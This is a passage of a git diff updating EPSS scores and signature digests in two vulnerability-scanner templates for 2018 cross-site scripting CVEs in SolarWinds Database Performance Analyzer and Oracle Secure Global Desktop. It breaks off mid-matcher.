4b0a0048304602210090b7c4edd4c127a79d86dc4abaf904d1824c80ea71d105ca09e9a2e6cb1828e5022100cb323237b584002fee5d16cf0f31b5ab2ca6ffbb74658eaa2d5d6078456a54a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 76efacdad1..e994162c33 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.58304 + epss-percentile: 0.58324 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009d23626451d93abf5d127affb5e49d4db8262d55e07688f0aef5db9e2a498059022100f367971c1eaae2e805040f31cc11d7a27278eca13c5d2f96f4e414ee3b94bc83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009d23626451d93abf5d127affb5e49d4db8262d55e07688f0aef5db9e2a498059022100f367971c1eaae2e805040f31cc11d7a27278eca13c5d2f96f4e414ee3b94bc83:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index b5bee9a705..f2a197be47 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-19439 cwe-id: CWE-79 epss-score: 0.01081 - epss-percentile: 0.82717 + epss-percentile: 0.82734 cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -34,4 +34,5 @@ http: part: body words: - "